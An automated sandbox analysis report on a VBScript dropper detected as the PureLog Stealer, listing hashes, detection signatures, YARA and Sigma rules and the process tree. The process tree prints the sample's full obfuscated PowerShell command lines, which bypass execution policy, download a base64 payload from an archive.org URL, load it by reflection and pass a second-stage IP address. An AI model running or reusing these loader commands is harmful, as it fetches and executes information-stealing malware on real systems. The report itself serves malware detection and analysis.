Edit tour
Windows
Analysis Report
ZJbugHcHda.vbs
Overview
General Information
Sample name: | ZJbugHcHda.vbsrenamed because original name is a hash value |
Original sample name: | 01b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d.vbs |
Analysis ID: | 1523821 |
MD5: | 134f2e8115174dea5246b807fd0c8427 |
SHA1: | c47a738087706c17b345c8b93b8eb71c1518e3a8 |
SHA256: | 01b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6448 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\ZJbug HcHda.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6596 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JiAoICRzaE VsbElkWzFd KyRTSEVsTG lEWzEzXSsn eCcpICggKC d4UGl1cmwn KycgPScrJy BzJysna3Jo dHRwJysncz ovLycrJ2lh NjAwMTAwJy snLnVzLicr J2FyY2hpdi crJ2Uub3Jn JysnLzI0L2 l0JysnZScr J21zL2RldG FoLScrJ25v dGUtJysndi 9EZScrJ3Rh aE5vdGVWJy snLnR4dHNr Jysncjt4UG knKydiYScr J3NlJysnNj RDbycrJ24n Kyd0ZScrJ2 50ID0gKCcr J05ldy1PYm plJysnY3Qg UycrJ3lzdG VtLicrJ05l dC5XZWJDJy snbGknKydl bnQpLicrJ0 Rvd25sJysn b2FkU3RyaW 4nKydnKHhQ aXVybCk7Jy sneFAnKydp JysnYmluYX J5JysnQ29u dGUnKydudC A9IFtTeXN0 JysnZW0uQ2 9udmVydF06 OkZyb21CJy snYScrJ3Nl NjRTJysndH JpbicrJ2co eFBpJysnYm FzZTY0Q29u dGUnKyduJy sndCk7eFBp YXMnKydzZW 1ibHkgPScr JyBbUmVmbG VjJysndCcr J2knKydvbi 5Bc3NlbWJs eScrJ106Jy snOkwnKydv YWQoJysneF BpYmluJysn YXInKyd5Q2 9udGVudCk7 eFAnKydpdH knKydwZSA9 IHgnKydQaW FzJysnc2Vt JysnYicrJ2 x5LkdlJysn dFR5cCcrJ2 Uoc2tyJysn UnUnKyduUC crJ0UuSG9t ZXNrcicrJy k7eFBpJysn bWUnKyd0aG 9kID0geFBp dHknKydwZS 5HZXRNZXQn KydobycrJ2 QoJysnc2ty VkFJc2tyJy snKTt4UCcr J2knKydtZX Rob2QnKycu SW52Jysnb2 tlKHhQaW51 bGwnKycsJy snIFsnKydv YmplJysnY3 RbXV1AJysn KHNrcnR4dC 5LS1JPTksn KycvYmsvcH BtYXgnKycv ODQyLjcnKy cyJysnMi41 NTIuNDMxLy 86cCcrJ3R0 aHNrciAsJy snICcrJ3Mn KydrcmRlc2 F0aXZhZG8n Kydza3IgLC AnKydza3Jk JysnZXNhdG l2JysnYWQn KydvcycrJ2 snKydyICcr Jywgc2tyZC crJ2UnKydz YXRpdmFkb3 Nrcixza3JS ZScrJ2dBcy crJ21zaycr J3Isc2tyc2 tyKSknKS5S RVBsQWNFKC d4UGknLCck JykuUkVQbE FjRSgoW2NI QXJdMTE1K1 tjSEFyXTEw NytbY0hBcl 0xMTQpLFtT VHJpTkddW2 NIQXJdMzkp KQ==';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6616 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7052 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "& ( $ shEllId[1] +$SHElLiD[ 13]+'x') ( ('xPiurl' +' ='+' s' +'krhttp'+ 's://'+'ia 600100'+'. us.'+'arch iv'+'e.org '+'/24/it' +'e'+'ms/d etah-'+'no te-'+'v/De '+'tahNote V'+'.txtsk '+'r;xPi'+ 'ba'+'se'+ '64Co'+'n' +'te'+'nt = ('+'New- Obje'+'ct S'+'ystem. '+'Net.Web C'+'li'+'e nt).'+'Dow nl'+'oadSt rin'+'g(xP iurl);'+'x P'+'i'+'bi nary'+'Con te'+'nt = [Syst'+'em .Convert]: :FromB'+'a '+'se64S'+ 'trin'+'g( xPi'+'base 64Conte'+' n'+'t);xPi as'+'sembl y ='+' [Re flec'+'t'+ 'i'+'on.As sembly'+'] :'+':L'+'o ad('+'xPib in'+'ar'+' yContent); xP'+'ity'+ 'pe = x'+' Pias'+'sem '+'b'+'ly. Ge'+'tTyp' +'e(skr'+' Ru'+'nP'+' E.Homeskr' +');xPi'+' me'+'thod = xPity'+' pe.GetMet' +'ho'+'d(' +'skrVAIsk r'+');xP'+ 'i'+'metho d'+'.Inv'+ 'oke(xPinu ll'+','+' ['+'obje'+ 'ct[]]@'+' (skrtxt.KK RONK'+'/bk /ppmax'+'/ 842.7'+'2' +'2.552.43 1//:p'+'tt hskr ,'+' '+'s'+'krd esativado' +'skr , '+ 'skrd'+'es ativ'+'ad' +'os'+'k'+ 'r '+', sk rd'+'e'+'s ativadoskr ,skrRe'+'g As'+'msk'+ 'r,skrskr) )').REPlAc E('xPi','$ ').REPlAcE (([cHAr]11 5+[cHAr]10 7+[cHAr]11 4),[STriNG ][cHAr]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |